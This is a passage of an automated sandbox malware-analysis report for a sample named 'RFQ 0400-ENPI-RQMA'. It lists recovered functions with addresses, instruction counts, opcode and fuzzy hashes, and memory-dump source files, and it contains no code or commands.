                                                                                      • Opcode ID: ff3c97e2505e33fbc8088c990744554eebfc4e202b235af86f12ce27a6662d25
                                                                                      • Instruction ID: 32c1e96ed06e443b3fd752861966c75c767e752ee55e37c923233b809287dc3e
                                                                                      • Opcode Fuzzy Hash: ff3c97e2505e33fbc8088c990744554eebfc4e202b235af86f12ce27a6662d25
                                                                                      • Instruction Fuzzy Hash: 6CF0CDF4E0034A8FEB18CFA8C900A6FBFF0EB44210F444699E165D7291C7319042CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07B276D4 Relevance: .0, Instructions: 24COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a495563772b55a1a95324bb5d3440ea9bb087032a54e4f47237c1b8ea2cf93b7
                                                                                      • Instruction ID: 5b4efa7e7b276816a42ee8c6705a950559aeb7f2fef5c49a3f571a84dbe0c721
                                                                                      • Opcode Fuzzy Hash: a495563772b55a1a95324bb5d3440ea9bb087032a54e4f47237c1b8ea2cf93b7
                                                                                      • Instruction Fuzzy Hash: DAE01A3505E3E0AED7036B3C89614957FB1AE47304B0948E7D1C48A077D628884ED75A
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07B2C009 Relevance: .0, Instructions: 21COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3cd3608ae229a6c5eaabfdd4e2ee732c45edad62a5a94ae4109cf0325baaf254
                                                                                      • Instruction ID: 252686d54e1d83e6110594a0be232596518df861981d2b768d5b171c417fd402
                                                                                      • Opcode Fuzzy Hash: 3cd3608ae229a6c5eaabfdd4e2ee732c45edad62a5a94ae4109cf0325baaf254
                                                                                      • Instruction Fuzzy Hash: 86E022B69442119FE320DB38C8059CBBFF0AB0A2A4F24C69AD029D72A1C73581078B81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07B2E708 Relevance: .0, Instructions: 18COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 02c597cd79b6c6277ff3957307475cd517450078a1ac8f14fab612c6efcd52ea
                                                                                      • Instruction ID: cb82b0a64e1d1daec5f212f8839b39cef62de8fcbd7a66128c1a7fbdeb0b5180
                                                                                      • Opcode Fuzzy Hash: 02c597cd79b6c6277ff3957307475cd517450078a1ac8f14fab612c6efcd52ea
                                                                                      • Instruction Fuzzy Hash: E2D02EF05433889FE3872A50FD1CA183E28EB01308F04C0A4E8888B2B2C7A04A458F62
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07B241FC Relevance: .0, Instructions: 18COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: abb50a48eb25c33db12705e07fcf9e21c0342b69d71cbbaab174038970fd1fbe
                                                                                      • Instruction ID: 524cecf1f58e574aa72f5a3b0ab76b3447ed0a347ace8971fcb322d4b634da24
                                                                                      • Opcode Fuzzy Hash: abb50a48eb25c33db12705e07fcf9e21c0342b69d71cbbaab174038970fd1fbe
                                                                                      • Instruction Fuzzy Hash: CFE086B4616394DFC714CB60D1448587BB1FF49345B2114D9D00B9B634D735D8C2CE01
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07B2C018 Relevance: .0, Instructions: 18COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8f27b6dc4d7b819f5b2d4c0328a0abb2e0f4c0cddb411a280fef8e755c507c22
                                                                                      • Instruction ID: c7862ea398d20a2a3bdf996c267ad61000d0b64d88624a00dfab37dba01bb4f0
                                                                                      • Opcode Fuzzy Hash: 8f27b6dc4d7b819f5b2d4c0328a0abb2e0f4c0cddb411a280fef8e755c507c22
                                                                                      • Instruction Fuzzy Hash: 80E092B4D502199FD750EFA9C905A5FBFF0BF08600F1185A9D019E7221E7749A058F91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07B21DC1 Relevance: .0, Instructions: 17COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6f869066030955b26f7dcbcf88159c3f02acbfa484e0a4e057d3d81220b1a8f8
                                                                                      • Instruction ID: 4589592ef40399d098a2f98c73bc95631e7f2321bd4dfd39cca774cb4ace3bc0
                                                                                      • Opcode Fuzzy Hash: 6f869066030955b26f7dcbcf88159c3f02acbfa484e0a4e057d3d81220b1a8f8
                                                                                      • Instruction Fuzzy Hash: DBD0A7B150621CBFD340EAB5F5092A5776AE745251F0041A5F408C2100FBB20A469692
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07B24184 Relevance: .0, Instructions: 16COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4dc00aaa5a8f6651054c6bf89af7aad5b096e824bb9786e7e297661b25720ea5
                                                                                      • Instruction ID: cad2112844c764c9a6b49cd5dfa229304a848884a201270766de3555abb33fee
                                                                                      • Opcode Fuzzy Hash: 4dc00aaa5a8f6651054c6bf89af7aad5b096e824bb9786e7e297661b25720ea5
                                                                                      • Instruction Fuzzy Hash: 14E08C74612358EFCB54DFA0C548589BBB0FF49380B1004AAD81ACF26DD3369982CF10
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07B2C110 Relevance: .0, Instructions: 14COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3cb63e668d3a148b005665b812aec63811d27ee27e520562bf6ceb92aa211398
                                                                                      • Instruction ID: 475f7cf8862c300555be9be0695ee9147596770167a55d6419676ec9e69d29b0
                                                                                      • Opcode Fuzzy Hash: 3cb63e668d3a148b005665b812aec63811d27ee27e520562bf6ceb92aa211398
                                                                                      • Instruction Fuzzy Hash: 37D012B62101199E5B40EE95EC00D667FEDBB24650700C462E548C7020E622F435E762
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07B21DC8 Relevance: .0, Instructions: 13COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 04ef78c28d9614e6f4633fabbad7b616e16d024083a2be976ca7359b7e61c9ad
                                                                                      • Instruction ID: d59b338cb4c58f09b8a59e9e16a0633780de3a456ee636701ec370d3c90b65b2
                                                                                      • Opcode Fuzzy Hash: 04ef78c28d9614e6f4633fabbad7b616e16d024083a2be976ca7359b7e61c9ad
                                                                                      • Instruction Fuzzy Hash: 89C012B160225CBFC340EAB9A508655BAABE745251F404194B409D3140EB710540A652
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07B27A62 Relevance: .0, Instructions: 13COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: edb21694e8ec327e6cd85c399da53595887ca7f337acf29cb0ada8a7adb47e19
                                                                                      • Instruction ID: 6e125b6eeb5df5d360860449c6b1083f65c453ea7684196b1c623943ee71d270
                                                                                      • Opcode Fuzzy Hash: edb21694e8ec327e6cd85c399da53595887ca7f337acf29cb0ada8a7adb47e19
                                                                                      • Instruction Fuzzy Hash: FBD022F215B280ABF2061320AD006126A22AB73720F0048E6F348920A0D8A18817A52E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07B22435 Relevance: .0, Instructions: 12COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 300183045444b9a5ec22a9c08a59534cc060d292ebc51f1a66b07e8e4c5cf39c
                                                                                      • Instruction ID: 45dd4fb185d2038728ce096c63f2380be0ff96f2b8ff9983eef2688510a47a23
                                                                                      • Opcode Fuzzy Hash: 300183045444b9a5ec22a9c08a59534cc060d292ebc51f1a66b07e8e4c5cf39c
                                                                                      • Instruction Fuzzy Hash: DDD01770E0621D9FCB84DB28DE84A9DB7B6EB84200F10D6A5D009A7224DA705E898F15
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07B23F65 Relevance: .0, Instructions: 11COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8317db5ace0dd79d4f753598fa1468759fe33d0c252cb16dcb8a177e462d4113
                                                                                      • Instruction ID: ad0c19722c11aaaacbfa7cd758b0a87e28509391a3a590729b5616e0488014f7
                                                                                      • Opcode Fuzzy Hash: 8317db5ace0dd79d4f753598fa1468759fe33d0c252cb16dcb8a177e462d4113
                                                                                      • Instruction Fuzzy Hash: 83D09E74A02259DFC754CFA1D684499BBF2AF89341F215555D0069B228C735DD81DE50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07B2E718 Relevance: .0, Instructions: 10COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a5b0e3dc81dac8670395495fc8f48c9f44d09da2cf8ce9a33a5c0a372bbf8f06
                                                                                      • Instruction ID: 11b4ed7a7df13c0cea7d1b964f25a4684828cc15df610b52c0a2f175efa88ead
                                                                                      • Opcode Fuzzy Hash: a5b0e3dc81dac8670395495fc8f48c9f44d09da2cf8ce9a33a5c0a372bbf8f06
                                                                                      • Instruction Fuzzy Hash: E3C08CB0103248AFD2003799FA0C32876A89B00216F04C050E00C00560CAB05490DB12
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07B27A6C Relevance: .0, Instructions: 8COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3d1e561cafe867ed14a297e7e8db7a18feed9be364e5407bf42c3b4ead9b4685
                                                                                      • Instruction ID: 1b4033f59ac888bd837a3d92c4a6814a7f62dfa1a00c5d39e9ff06d19bb8f001
                                                                                      • Opcode Fuzzy Hash: 3d1e561cafe867ed14a297e7e8db7a18feed9be364e5407bf42c3b4ead9b4685
                                                                                      • Instruction Fuzzy Hash: 16B012F92B7150F7E40163646F40A2AD601EBB3B20F00DCA1F30DF0078C920846AB12F
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07B21969 Relevance: .0, Instructions: 8COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9b93dbd7ab3bace628f941cbad7d9a7eb78c4b4defbd25595d87525278f15164
                                                                                      • Instruction ID: 1cd95f75048ae73c194dc007aa113b100dd6c0fc78c2a234315f322c8f9b65e2
                                                                                      • Opcode Fuzzy Hash: 9b93dbd7ab3bace628f941cbad7d9a7eb78c4b4defbd25595d87525278f15164
                                                                                      • Instruction Fuzzy Hash: 53B09B95F141545FC346577441141451A9677D9200F918056C0419A659DC3549454F12
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07B29571 Relevance: .0, Instructions: 6COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d3bceeb3d620fe779f9550143fd77af8dfb625e502f3f02ab3289b7dfe818517
                                                                                      • Instruction ID: f713007fb6261a58768d70fdf635c0ec3c5f7549d343d3174b93167a72457874
                                                                                      • Opcode Fuzzy Hash: d3bceeb3d620fe779f9550143fd77af8dfb625e502f3f02ab3289b7dfe818517
                                                                                      • Instruction Fuzzy Hash: D8A002760110109DE75677508505C457B51BB5561434584E1D5851503159219525E75A
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07B2AC4A Relevance: .0, Instructions: 6COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7923eebe772f865e445e942c2222e7108de860cacdde58d18978998ccbc0a430
                                                                                      • Instruction ID: e870c9051e13abe1b8c315903d7cfb5a4b99fd6c55838b76f6e6e1e56213b2ae
                                                                                      • Opcode Fuzzy Hash: 7923eebe772f865e445e942c2222e7108de860cacdde58d18978998ccbc0a430
                                                                                      • Instruction Fuzzy Hash: DCB012B6501340F9F6C62660CC018057160FB72700714C099E34C00124E7B60922E72F
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Non-executed Functions

                                                                                      Function 07B2C310 Relevance: 5.3, Strings: 4, Instructions: 259COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: T+-q$[V~*$[V~*$]\`
                                                                                      • API String ID: 0-1849991408
                                                                                      • Opcode ID: a6251f9a45f5dec353fe3bc3dacbb8eb2acd991884b667da56ad064ae487e084
                                                                                      • Instruction ID: a56c7d2461e3e9fc11f36358fce5c62012d85ef8edb22ca5d2cf7ed27e07fc8f
                                                                                      • Opcode Fuzzy Hash: a6251f9a45f5dec353fe3bc3dacbb8eb2acd991884b667da56ad064ae487e084
                                                                                      • Instruction Fuzzy Hash: ECB1D8B0E1A619DBDB04CFAAD58089EFBF2FF89300F14D55AD419AB218D7309942CF64
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07B2C301 Relevance: 4.0, Strings: 3, Instructions: 260COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: T+-q$[V~*$]\`
                                                                                      • API String ID: 0-3978741314
                                                                                      • Opcode ID: a77bdff375595409cd132658ef271bc7af302a8f78a0b78a37a5266f3275910b
                                                                                      • Instruction ID: b9c6ec86cd7504c8d37343416268597ad46f01171b880502274712ad5a96942c
                                                                                      • Opcode Fuzzy Hash: a77bdff375595409cd132658ef271bc7af302a8f78a0b78a37a5266f3275910b
                                                                                      • Instruction Fuzzy Hash: 9DB1EAB0E15219DBDB04CFAAD58049EFBF2FF89300F14D55AD419AB219D7349942CF64
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07B2C4CC Relevance: 4.0, Strings: 3, Instructions: 201COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: T+-q$[V~*$]\`
                                                                                      • API String ID: 0-3978741314
                                                                                      • Opcode ID: b0bd7913c0f7aaae681f27eb47d59b5e55878e19ba15f86cb1c7cc8414b4a696
                                                                                      • Instruction ID: a47716d16fdc2f77d5c2fcdea0a0efac1ecccd574a1802475ff44d4347366ee1
                                                                                      • Opcode Fuzzy Hash: b0bd7913c0f7aaae681f27eb47d59b5e55878e19ba15f86cb1c7cc8414b4a696
                                                                                      • Instruction Fuzzy Hash: 00811AB4E1A229DBDB04CFA9D98089EFBB2FF99300F149956D419F7219D3309902DF64
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07B23189 Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 7Z/t$RWIK$[[bb
                                                                                      • API String ID: 0-1157992699
                                                                                      • Opcode ID: 831baa1fe7ed578596b9e409370eb5f236c7882c2323ca0a93695ebe7f92f975
                                                                                      • Instruction ID: 94558afae0d886daf36a77812d704d98b6df02596a1a70a16810c6d015f7f2bf
                                                                                      • Opcode Fuzzy Hash: 831baa1fe7ed578596b9e409370eb5f236c7882c2323ca0a93695ebe7f92f975
                                                                                      • Instruction Fuzzy Hash: 0B6129B0E152199FDB08CFAAC4415AEFFF2EF89300F14D06AD419A7254D7388A428F94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07D850F8 Relevance: 1.6, Strings: 1, Instructions: 312COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664257787.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7d80000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: s,M;
                                                                                      • API String ID: 0-2638591878
                                                                                      • Opcode ID: 4f8d37576c076227f5d6815d321fbcff0a73bc8261af895ef99461aef761895c
                                                                                      • Instruction ID: 4fcd6eb1081fc26ea2e98903ff4f49064ecf1f5e555df8e0f82db94c89e09af2
                                                                                      • Opcode Fuzzy Hash: 4f8d37576c076227f5d6815d321fbcff0a73bc8261af895ef99461aef761895c
                                                                                      • Instruction Fuzzy Hash: 58E105B4E012198FCB14DFA9D5849AEFBB2FF89305F24C169E415AB316DB30A941CF61
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07B21DF9 Relevance: 1.3, Strings: 1, Instructions: 75COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 0
                                                                                      • API String ID: 0-4108050209
                                                                                      • Opcode ID: 59ac94bd8f889dfa0c99ce751ff95077c31b27fd4dd807b3b54f86ee1bde482c
                                                                                      • Instruction ID: 12af42d57fde7859f551b545359a0ed64fa96b649a71db518142ead06611d8da
                                                                                      • Opcode Fuzzy Hash: 59ac94bd8f889dfa0c99ce751ff95077c31b27fd4dd807b3b54f86ee1bde482c
                                                                                      • Instruction Fuzzy Hash: A731EFB1E056189BEB58CFABD8506DEFBF3BFC8200F14C0BAD408A6214DB344A468F51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07D83070 Relevance: .3, Instructions: 322COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664257787.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7d80000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b83fa69afe376ba810ba0581a6491f7851e4693202d2481b6e7744fb48a87044
                                                                                      • Instruction ID: af0cf25f773eb92d317709ebda1045751e0cde5fb771fbbd841d4c20f6834908
                                                                                      • Opcode Fuzzy Hash: b83fa69afe376ba810ba0581a6491f7851e4693202d2481b6e7744fb48a87044
                                                                                      • Instruction Fuzzy Hash: 32E129B4E011598FCB14DFA9D5849AEFBB2FF89304F24C169D418AB356DB30A941CF61
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07D84CC0 Relevance: .3, Instructions: 312COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664257787.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7d80000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 074974dfed825b241c09bf18fa1c347d59b829f028d21bd3e865cea1e0353167
                                                                                      • Instruction ID: 4a8275b15ad4d9fcb3bc59f851b98744284f58574dae1bf86762646e0c540e53
                                                                                      • Opcode Fuzzy Hash: 074974dfed825b241c09bf18fa1c347d59b829f028d21bd3e865cea1e0353167
                                                                                      • Instruction Fuzzy Hash: C0E126B4E0015A8FDB14DFA9D5849AEFBB2FF89304F24C169E414AB356DB30A941CF61
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07D834B8 Relevance: .3, Instructions: 312COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664257787.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7d80000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d9e85fc37bfa8b511681099e98e4e0c8550eb037ba86d75adb5980df23d63f66
                                                                                      • Instruction ID: a562ab528a6eb5d762856263ecf848b883708022dda9bb2cf1c59227b883a040
                                                                                      • Opcode Fuzzy Hash: d9e85fc37bfa8b511681099e98e4e0c8550eb037ba86d75adb5980df23d63f66
                                                                                      • Instruction Fuzzy Hash: 94E116B4E001598FDB14DFA9C9849AEFBB2FF89305F24C169D418AB356DB30A941CF61
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07D82C48 Relevance: .3, Instructions: 312COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664257787.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7d80000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 50e5d175c566ad8648eb49ab6a832c4b81d05678557643b27e46e61cb65de82f
                                                                                      • Instruction ID: bbfcc47965b3ea137a77ce5b66e4ab5d00653bd517fef2c615dd499f82f6b707
                                                                                      • Opcode Fuzzy Hash: 50e5d175c566ad8648eb49ab6a832c4b81d05678557643b27e46e61cb65de82f
